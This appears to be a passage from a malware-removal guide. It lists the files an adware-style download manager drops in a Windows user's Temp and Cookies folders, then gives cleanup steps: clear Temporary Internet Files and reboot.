%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\logo4[1].png (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Pause_Button.png (577 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.